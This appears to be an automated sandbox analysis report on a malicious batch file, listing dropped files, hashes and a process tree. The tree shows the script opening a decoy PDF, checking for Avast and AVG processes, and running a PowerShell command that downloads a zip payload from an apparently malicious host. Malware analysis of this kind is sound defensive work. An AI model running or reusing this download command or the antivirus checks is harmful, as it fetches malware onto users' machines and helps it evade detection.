                                                                                            SSDEEP:384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
                                                                                            MD5:128A51060103D95314048C2F32A15C66
                                                                                            SHA1:EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
                                                                                            SHA-256:601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
                                                                                            SHA-512:55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
                                                                                            Malicious:false
                                                                                            Preview:SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):15114
                                                                                            Entropy (8bit):5.329614172400296
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:YRN8l5YibX4gZvDoWQoyng5xSFyJaN1P4bOS4wAeyjQeolvQgYz4VaVsdfFaAp5L:7Im
                                                                                            MD5:F3161C2CDB4F4BB55950AE18E52B4281
                                                                                            SHA1:EA1098AD360E825E5E6EBA25898C7AEFA8A92D3C
                                                                                            SHA-256:514DC5CAE2F31259C7B53E3CA340D17D5117FEABB285BBB40FDA612DCA0B3BE5
                                                                                            SHA-512:700EF056C4E588E6DE4A05846ACA39E7FF83430AD925F1965243E2D060464DB4417FC27D3C1B520B72AEBEC47333669108232A849031980AF457EC9DA3C8949C
                                                                                            Malicious:false
                                                                                            Preview:SessionID=ee566f41-f85c-4fcc-a28f-53124efff35d.1731445925466 Timestamp=2024-11-12T16:12:05:466-0500 ThreadID=4856 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=ee566f41-f85c-4fcc-a28f-53124efff35d.1731445925466 Timestamp=2024-11-12T16:12:05:467-0500 ThreadID=4856 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=ee566f41-f85c-4fcc-a28f-53124efff35d.1731445925466 Timestamp=2024-11-12T16:12:05:467-0500 ThreadID=4856 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=ee566f41-f85c-4fcc-a28f-53124efff35d.1731445925466 Timestamp=2024-11-12T16:12:05:467-0500 ThreadID=4856 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=ee566f41-f85c-4fcc-a28f-53124efff35d.1731445925466 Timestamp=2024-11-12T16:12:05:467-0500 ThreadID=4856 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):29752
                                                                                            Entropy (8bit):5.394718422458079
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbOcb0IWccbZ:V3fOCIdJDerWb
                                                                                            MD5:E566E84D4F28BBAB526DE68A1CE80A83
                                                                                            SHA1:F3BB718F8A9304B7BBA843B94C47977C5ACCB957
                                                                                            SHA-256:23B9BD423D7E38E99D93A8A5CD2C11D53E98B76D028A5015632A026F2F788E6F
                                                                                            SHA-512:EC99AC754CF4ED0337377F3D7C7ED498494BEA09887B2570C8AB59719A3A4C219A50AC24744EEEDD2A862A9ABCF6F1697C47974D363C5927FF4705F9A4727B39
                                                                                            Malicious:false
                                                                                            Preview:05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                            Category:dropped
                                                                                            Size (bytes):386528
                                                                                            Entropy (8bit):7.9736851559892425
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                            MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                            SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                            SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                            SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                            Malicious:false
                                                                                            Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                            Category:dropped
                                                                                            Size (bytes):1419751
                                                                                            Entropy (8bit):7.976496077007677
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                                            MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                                            SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                                            SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                                            SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                                            Malicious:false
                                                                                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                            Category:dropped
                                                                                            Size (bytes):1407294
                                                                                            Entropy (8bit):7.97605879016224
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje
                                                                                            MD5:716C2C392DCD15C95BBD760EEBABFCD0
                                                                                            SHA1:4B4CE9C6AED6A7F809236B2DAFA9987CA886E603
                                                                                            SHA-256:DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8
                                                                                            SHA-512:E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF
                                                                                            Malicious:false
                                                                                            Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                            Category:dropped
                                                                                            Size (bytes):758601
                                                                                            Entropy (8bit):7.98639316555857
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                            MD5:3A49135134665364308390AC398006F1
                                                                                            SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                            SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                            SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                            Malicious:false
                                                                                            Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):98682
                                                                                            Entropy (8bit):6.445287254681573
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
                                                                                            MD5:7113425405A05E110DC458BBF93F608A
                                                                                            SHA1:88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
                                                                                            SHA-256:7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
                                                                                            SHA-512:6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
                                                                                            Malicious:false
                                                                                            Preview:0...u0...\...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210
                                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):737
                                                                                            Entropy (8bit):7.501268097735403
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
                                                                                            MD5:5274D23C3AB7C3D5A4F3F86D4249A545
                                                                                            SHA1:8A3778F5083169B281B610F2036E79AEA3020192
                                                                                            SHA-256:8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
                                                                                            SHA-512:FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
                                                                                            Malicious:false
                                                                                            Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R*.......~....)....i.*n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                            Category:dropped
                                                                                            Size (bytes):48684280
                                                                                            Entropy (8bit):7.995502211314728
                                                                                            Encrypted:true
                                                                                            SSDEEP:786432:hADXXuC9mkLqH0C1SWvEWbW7ZhG0HQaocLeo0mGzt+Vxe7IXx:ODngkLqHDxsbVh5waNLglG4IXx
                                                                                            MD5:CDA826BAC4356E7B66AFAE588BE7E8C8
                                                                                            SHA1:A7CCDDC07337D246D509E0516281492F5D7746B5
                                                                                            SHA-256:29F3682EB100574A1F2E9196917FDFAC98ADF2D017B649049C6B2F4B939987AD
                                                                                            SHA-512:62C5AEDADAA97B0B10DBB5CC9F7759EE36D98A8F1AA3B83109B509BDB3FFB6125C161C1DA324DC08914E09D08439A862FD5C04F3CDF8FAF6BD3F8B2F7CE39DA1
                                                                                            Malicious:true
                                                                                            Preview:PK...........X................Python/Launcher/PK........Vv.Xn...44..........Python/Launcher/py.exe.{|.E...L..Cz....!@.h.#.H...$*..1...X..8."tC\..;....rwau....]v....$....<.1..(..]t+.j........$.{.......q.tWW.:u....).k..(....t]..../W.....AH..Z..c.{..,s..ug......w...L...z.a)..e.....{(}......^.l..!.2..+'O.3.t.H.........e#^d..G\...G.F8.......{n|wd6.[8b..p.,....p..oG..].y.}?.`;..'.W..X......f^..`.lI.F.<A...dy)A.8./..[......y...s;?..|.]...6v...M-..R.J.....[..`.u#.....P.F.p.......w...m......eU....L..a_.}a..a...K.$.H..</...+.......9....6(..}.Ep...W,.1.y_A.....K.[......<.\p....7S......u.og...c..:.>......u.....u.F[t.Wi.....A.."..5....b..?.^x'.w.U*bU.X.EW....bA}|.>.].........E.%P..7.c.=.NlP[i..Qu...N..8|.M..t.. l..f..}jm......>._*.>...v....p...P/...t}..#..Yi.C]bAG.k.<}.b.x..*.l.M.,.=.....k(,9..em.VLp.+T(.u..V(.3l.4.j.|z.....a........bh.:A;Aq......S.-.O. .Od[).....[G.Q...@....}z...p:.b.t. ..f.`F....~|...&u= ..U..P....f........F\...G/..)...c....&.?3...
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):55
                                                                                            Entropy (8bit):4.306461250274409
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                            Malicious:false
                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                            File type:Unicode text, UTF-8 text, with very long lines (1385), with CRLF line terminators
                                                                                            Entropy (8bit):5.466819010255616
                                                                                            TrID:
                                                                                            • Help File Contents (3001/1) 100.00%
                                                                                            File name:new.bat
                                                                                            File size:30'637 bytes
                                                                                            MD5:f5cedb5682cb997b731bde5f07b13315
                                                                                            SHA1:b5468b547b0f65a7a154e2c1dcafc0b54187117e
                                                                                            SHA256:af17483ec56816e1aa02ba3ed28609742b6390912ba9d73e78790c602e1ce0a3
                                                                                            SHA512:180c4f89cf9a10b8242f04dc7122e909e3e6f29167e91bebf3187f39e69abace57415e5efe9d0c2f057fc3e09f89add674629e77c4b5672a732fefe599900316
                                                                                            SSDEEP:768:gTYcpQyuPmhDGEhtKC/FdgcB0KFJsRV6EBVRzzaQ4ovjkCkV6PeTUF5:gTYcpQyuPmhDGEhtKC/vBTQvVHhvpu6N
                                                                                            TLSH:17D27D3A55BA8333769551B330A9CA6DFB0C87C449F80D10F2FCAC96B78B92631E46C5
                                                                                            File Content Preview::: ............ ......... ........................... .................. ......... ...... .................. ......... ...... ........................... ......... ..................... ..:: ..................... .................. ...
                                                                                            Icon Hash:9686878b929a9886
                                                                                            Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:16:12:01
                                                                                            Start date:12/11/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" "
                                                                                            Imagebase:0x7ff674630000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:1
                                                                                            Start time:16:12:01
                                                                                            Start date:12/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:3
                                                                                            Start time:16:12:01
                                                                                            Start date:12/11/2024
                                                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf"
                                                                                            Imagebase:0x7ff651090000
                                                                                            File size:5'641'176 bytes
                                                                                            MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:4
                                                                                            Start time:16:12:01
                                                                                            Start date:12/11/2024
                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
                                                                                            Imagebase:0x7ff7dbde0000
                                                                                            File size:32'768 bytes
                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:16:12:01
                                                                                            Start date:12/11/2024
                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:tasklist /FI "IMAGENAME eq AvastUI.exe"
                                                                                            Imagebase:0x7ff7aa0f0000
                                                                                            File size:106'496 bytes
                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:16:12:01
                                                                                            Start date:12/11/2024
                                                                                            Path:C:\Windows\System32\find.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:find /i "AvastUI.exe"
                                                                                            Imagebase:0x7ff71a6b0000
                                                                                            File size:17'920 bytes
                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:16:12:02
                                                                                            Start date:12/11/2024
                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:tasklist /FI "IMAGENAME eq avgui.exe"
                                                                                            Imagebase:0x7ff7aa0f0000
                                                                                            File size:106'496 bytes
                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:16:12:02
                                                                                            Start date:12/11/2024
                                                                                            Path:C:\Windows\System32\find.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:find /i "avgui.exe"
                                                                                            Imagebase:0x7ff71a6b0000
                                                                                            File size:17'920 bytes
                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:16:12:02
                                                                                            Start date:12/11/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kendychop.shop:8930/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
                                                                                            Imagebase:0x7ff6e3d50000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:10
                                                                                            Start time:16:12:05
                                                                                            Start date:12/11/2024
                                                                                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                            Imagebase:0x7ff70df30000
                                                                                            File size:3'581'912 bytes
                                                                                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:11
                                                                                            Start time:16:12:05
                                                                                            Start date:12/11/2024
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                            Imagebase:0x7ff7403e0000
                                                                                            File size:55'320 bytes
                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
